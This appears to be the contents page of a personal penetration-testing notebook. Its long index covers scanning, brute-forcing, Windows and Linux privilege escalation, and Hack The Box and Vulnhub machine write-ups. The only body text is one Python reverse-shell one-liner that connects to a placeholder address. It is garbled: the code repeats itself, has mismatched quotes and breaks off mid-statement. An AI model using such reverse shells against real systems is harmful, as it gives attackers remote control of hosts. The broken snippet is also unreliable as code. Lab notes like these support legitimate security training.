Index
- Scanning
- Enumeration
- HTTP
- Gobuster
- Nikto
- dirsearch
- WFuzz
- Command Injection
- Login Bypass
- Droopal Scan
- SSRF
- Hydra post form
- cewl
- FTP-21
- Download file from ftp
- Autobind ftp when ftp is permission denied for local user
- Remeber while uploading file on ftp
- SSH
- SSH Tunneling / Pivoting
- enum_ssh
- rbash shell esacping
- Login with RSA
- Decrypt RSA
- When bruteforcing hydra don't work
- lshell bypass
- different shell and their errors
- port kncoking
- SMB
- SNMP
- MS SQL
- finger_enum_user.sh
- Telnet
- Pop3
- CMS
- Uncommon Port Exploitation search/Enum
- Steg extract
- RDP
- James 4555
- MDB tool
- OS
- Shell
- Intrective shell
- File Transfer
- WINDOWS - Privilege Escalation
- WINDOWS - Sharup Results
- WINDOWS - Kernel
- WINDOWS - Services (Binpath)
- WINDOWS -Services (Unquoted path)
- WINDOWS - Services (Registry)
- WINDOWS - Registry (Autorun)
- WINDOWS - Registry(AlwaysInstallElevated
- WINDOWS - PasswordMining (Memory)
- WINDOWS -Password (Registry)
- WINDOWS - Password (config files)
- WINDOWS -Scheduled task (Missing binary)
- WINDOWS -Startup Application
- WINDOWS - Passthehash
- WINDOWS - Unquoted Path Service
- WINDOWS - (AlwaysInstallElevated)
- WINDOWS - Automated Script
- Windows-Exploit-suggester
- Windows Gather Applied Patches
- Sherlock
- JAWS – Just Another Windows (Enum) Script
- powerup
- My Priv esc tech (Windows)
- mimiketz if discover protected SID files
- Login with obtained creds with psexec and powershell & smbclient
- Finding permission & actual file path of shortcut file or .lnk file
- icacls & cacls for find file & folder permissions and Edit permission
- Discovered VM on target loaction
- Discoverd .mdb backup
- Discovered .kdbx Keepass database
- search file recursively
- List hidden files
- Got .dmp file extract with volatality
- group.xml file with enocded password
- Get that "pass" out of the ADS backup.zip
- disable firewall enable rdp
- Finding windows version from a file
- got SAM System file use pwdump to dump hashes
- Windows
- LINUX - Privilege Escalation
- LINUX - /etc/passwd -deeply
- LINUX - Sudo -deeply
- Traditional Method to assign Root Privilege
- Default Method to assign Root Privilege
- find - Allow Root Privilege to Binary commands
- Allow Root Privilege to Binary Programs - Spawn shelll
- LINUX - SUID - NMAP
- LINUX - LD_Preload
- LINUX - SUID - vim-tiny
- LINUX -writable
- LINUX -CRON
- LINUX - Automated Script
- LINUX - capabilities capability
- LINUX - Binaries for escalation
- zip
- wget
- wget -2
- cat
- time
- Taskset
- git
- cp
- tmux
- tmux -2
- ed
- sed
- pip
- lxd
- socat
- scp
- capabilities
- perl
- docker
- perl -2
- tmp.py
- vi
- systemctl
- tar
- id-disk
- id-games
- python
- crontab
- tcpdump
- strace
- ssh
- make
- wine
- ftp
- micro
- mysql
- Simon
- tcpdump
- ht
- sls
- apt-get
- ed
- mawk
- LINUX - Exploiting SUDO CVE-2019-14287
- Buffer Overflow
- bruteforce
- ssh
- rdp
- ftp
- hashcat
- gpp-decrypt
- wp
- john
- hydra
- cewl and crunch
- medusa
- ncrack
- wfuzz
- fcrackzip
- keepass
- password Cracking
- compiling
- Tunneling
- Imp Tools
- HTB - linux
- HTB - windows
- HTB -ippsecc windows
- access
- active
- Arctic
- arkham
- bastard
- bastion
- blue
- bounty
- brainfuck
- chatterbox
- devel
- granny
- grandpa
- jeeves
- node
- kotarak
- lame
- legacy
- mantis
- netmon
- optimum
- querier
- secnotes
- oracle
- HTB -ippsecc linux
- Ariekei - docker
- Aragog - xxe
- Apocalyst - wp
- bank
- bart
- bashed
- beep
- bitlab
- blocky
- canape - db
- carrier
- chaos
- charon
- crimestoppers
- cronos
- curling
- dab - wfuzz
- DevOops
- Dropzone
- enterprise
- europa
- falafel
- flujab
- FluxCapacitor
- fortune - nfs
- FriendZone
- frolic - play
- haircut
- hawk
- haystack
- heist
- help
- irked
- jarvis
- lazy
- luke
- networked
- nibble
- nineveh
- zipper
- october
- onetwoseven
- oz
- poison
- popcorn
- sense
- shocker
- sneaky
- solidstate
- Stratosphere
- sunday
- swagshop
- tenten
- valentine
- waldo
- wall
- zetta
- teacher
- tatarsauce
- postman
- htbwithout msf - ranakhalil
- Bashed (linux)
- Devel (windows)
- Lame (linux)
- legacy (windows)
- Optimum (windows)
- Arctic (Windows)
- Shocker (linux)
- Valentine (linux)
- nibble (linux)
- cronos (linux)
- Blue (windows)
- Irked (linux)
- Friendzone (linux)
- brainfuck (linux)
- beep (linux)
- nineveh (linux)
- Active (Windows)
- sense (freebsd)
- solidstate (linux)
- node (linux)
- Poison (freebsd)
- Sunday (solaris)
- Swagshop (linux)
- Jarvis (linux)
- Networked (linux)
- TartarSauce (linux)
- LaCasaDePapel (linux)
- Hawk (linux) - drupal
- lightweight (linux)
- Devoops (linux)
- falafel (linux)
- kotarak (linux)
- bastard (windows)
- granny (windows)
- grandpa (windows)
- bounty (windows) gobuster - webconfig -juicy
- jerry (windows)
- chatterbox (windows)
- Sillo (windows)
- Conceal (Windows)
- Netmon (windows)
- jeeves (windows) jenkin
- bart (windows)
- tally (windows)
- jail
- safe
- bankrobber
- Vulnhub
- Bsides Vancouver
- raven 1
- raven 2
- acid 1
- violator
- troll 3
- pinkypalace v2
- pinkypalace v1
- digital world
- skytower
- IMF
- troll1
- troll 2
- /dev/random sleepy
- BILLY MADISON
- wallabys-nightmare
- solidstate- james
- web developer - wp
- zico 1
- lin.security
- lord of the root - mysql udf
- pwnos 2.0
- sickos
- vulnos 2
- Mr. Robot 1
- stapler
- firstileaks
- kioptix 2014
- kioptix 1.3
- kioptix 1.2
- kioptix 1.1
- kioptix 1
- metasploitable 3
- metasplotiable 2
- metasploitable 1
- Vulnhub2
- sunset desk
- me and my gf 1
- sunset sunrise
- UA Literally vulnerable
- in plain sight 1
- HA: Dhanush
- HA: Chanakya
- djinn
- Jigsaw
- evm1
- mumbai 1
- gears-of-war-ep1
- chakravyuh
- ha-avengers-arsenal
- ha-naruto
- joker - joomla
- isro
- hackerfest
- bossplayersctf
- Misdirection
- armour
- ha-wordy- wordpress
- dc8
- silky
- sunset dawn
- sunset dawn
- Prime
- teuchter
- violator
- symfonos4
- dc-7 - drupal
- ai web 2
- hack 6 day
- digitalworld-localtorment
- hack-the-gemini-inc2
- dev-random-k2-vm-boot2root
- hack the gemini
- ai web 1
- hack-the-lin-security - mast
- oracle padding
- nezuko-1-vulnhub
- minu-v2
- digitalworld-local-joy
- symfonos2
- Matrix-3
- pumpkinraising
- symfonos1
- W1R3S.inc VM
- hack the de ice
- hack-kevgir
- vulnos-1
- dexter
- pwnlab
- sputnik-1 splunk
- dc1
HTB - windows
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.ximport socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((“x.x.x.x
